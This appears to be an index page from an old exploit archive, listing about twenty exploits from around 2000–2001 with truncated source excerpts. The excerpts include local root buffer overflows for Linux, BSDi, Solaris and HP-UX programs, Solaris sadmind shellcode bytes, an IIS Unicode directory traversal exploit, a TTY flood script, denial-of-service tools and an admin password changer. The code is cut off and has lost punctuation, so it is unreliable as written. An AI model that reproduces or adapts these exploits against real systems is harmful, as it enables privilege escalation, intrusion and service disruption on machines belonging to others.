ml2 - Local users can Crash processes

include include include include error int mainint argc, char argv char foo1000; char bigmsg10000; char s, holds; int i = 0; memsetbigmsg, 'X', sizeofbigmsg-1; if argc \n", argv0; exit1; // fork; memsetfoo, 0, sizeoffoo; snprintffoo, sizeoffoo, "/proc/%s/stat", argv1; while accessfoo, FOK == 0 s =...

RedHat 6.16.2 - TTY Flood Users

RedHat 6.16.2 - TTY Flood Users !/bin/bash by teleh0r TTYDIR=/dev/pts NONSENSE=/bin/nice MYTTY=tty To prevent flooding of one's own TTY while /bin/true ; do for i in $TTYDIR/ ; do if -w $i -a -c $i -a $i != $MYTTY ; then cat $NONSENSE $i fi done done unset i milw0rm.com 2001-01-02...

Infinite Interchange 3.61 - Denial of Service

source: https://www.securityfocus.com/bid/2140/info Infinite Interchange is a multi function email server which supports most common internet protocols. An example of various functions include an http server and webmail interface. Unfortunately Interchange is subject to a denial of service. By...

Oops! 1.4.6 (one russi4n proxy-server) Heap Buffer Overflow Exploit

Exploit for bsd platform in category remote exploits =================================================================== Oops! 1.4.6 one russi4n proxy-server Heap Buffer Overflow Exploit ===================================================================...

BFTPd 1.0.12 Remote Exploit

Exploit for linux platform in category remote exploits =========================== BFTPd 1.0.12 Remote Exploit =========================== / Creates a filname to exploit the bug in bftpd 1.0.12 Create the file, cwd in the shell directory and nlist the file directory. Coded by korty / include...

Kwintv - Local Buffer Overflow

/ kwintv local buffer overflow. gid=video33 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/17/2000 For SuSE 7.0 - x86. sgid "video"33 by default. bash-2.04$ id uid=1000loophole gid=501noc bash-2.04$ ./b 0 Ret-addr 0xbfffe1fc, offset: 0, allign: 0. sh-2.04$ id...

Kwintv - Local Buffer Overflow

Kwintv - Local Buffer Overflow / kwintv local buffer overflow. gid=video33 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/17/2000 For SuSE 7.0 - x86. sgid "video"33 by default. bash-2.04$ id uid=1000loophole gid=501noc bash-2.04$ ./b 0 Ret-addr 0xbfffe1fc,...

expect (usrbinexpect) - Local Buffer Overflow

expect usrbinexpect - Local Buffer Overflow / hhp-expectsmash.c 12/11/00 expect /usr/bin/expect buffer overflow. Tested 5.31.8 and 5.28.1, slackware 7.x Maybe others. By: isox Site: www.hhp-programming.net Advisory: www.hhp-programming.net/ouradvisories/hhp-expectadv%2317.txt / include include...

Solaris sadmind - Remote Buffer Overflow

Solaris sadmind - Remote Buffer Overflow /\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz / include include include include include char shellsparc = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff" "\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"...

Solaris 2.67.0 - locale Format Strings noexec stack Overflow

Solaris 2.67.0 - locale Format Strings noexec stack Overflow / exploit for locale subsystem format strings bug In Solaris with noexec stack. Tested in Solaris 2.6/7.0 If it wont work, try adjust retloc offset. e.g. ./ex -o -4 $gcc -o ex ex.c ldd /usr/bin/passwd|sed -e...

BSDi 3.0 inc - Local Buffer Overflow Local Privilege Escalation

BSDi 3.0 inc - Local Buffer Overflow Local Privilege Escalation / BSDiincmh buffer overflow, by [email protected]. this is will give you euid=0root on BSDi/3.0 systems. / define PATH "/usr/contrib/mh/bin/inc" / path to inc on BSDi/3.0 / define BUFFER 2048 / no need to change this. / define...

dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation

dump 0.4b15 RedHat 6.2 - Local Privilege Escalation / dump-0.4b15x.c dump-0.4b15 exploit: Redhat 6.2 dump command executes external program with suid priviledge. affected: /sbin/dump /sbin/dump.static /sbin/restore /sbin/restore.static Bug found by [email protected] This example was coded by...

HP-UX 11.0 - pppd Local Stack Buffer Overflow

HP-UX 11.0 - pppd Local Stack Buffer Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: HP-UX pppd / / Tested...

Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)

/\ Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit proof of theory exploit cuz it's wednesday and i'm on the couch brought to you by the letter B, the number 7, optyx, and t12 optyx - t12 - greetz go out to aempirei, a gun toatin' gangstah' hustler' player motherfucker who isn'...

MS Windows IIS Unicode Remote Transversal Bug

Exploit for unknown platform in category remote exploits ============================================= MS Windows IIS Unicode Remote Transversal Bug ============================================= / iisex iis exploit grtz to: Bio, nos, zoa, reg and vor... who else would stay up at night to exploit...

xsplumber - strcpy() Local Buffer Overflow

xsplumber - strcpy Local Buffer Overflow / linuxsplumberversion2 buffer overflow, by [email protected]. this is a misc. exploit for the linux-SVGAlib space plumber game. which, as you know needs to be installed setuid root. this overflow is due to a simple oversight in the command line parser. us...

Oracle (oidldapd connect) - Local Command Line Overflow

/ Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd impact: any user gain euid=oracle. Dedicated to PlazaSite guys...

Oracle (oidldapd connect) - Local Command Line Overflow

Oracle oidldapd connect - Local Command Line Overflow / Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd impact:...

LBL Traceroute - Local Privilege Escalation

/ MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the corresponding advisory will be made available at: ftp://maxx.via.ecp.fr/traceroot/ This program is free software; you can redistribute it and/or modif...

News Update 1.1 - Change Admin Password

News Update 1.1 - Change Admin Password / newsexp.c - description ------------------- begin : Sat Oct 21 2000 copyright : C 2000 by Morpheusbd email : [email protected] advisory : www.brightdarkness.de Exploit code for the News Update 1.1 by Morpheusbd For more information see my advisory which...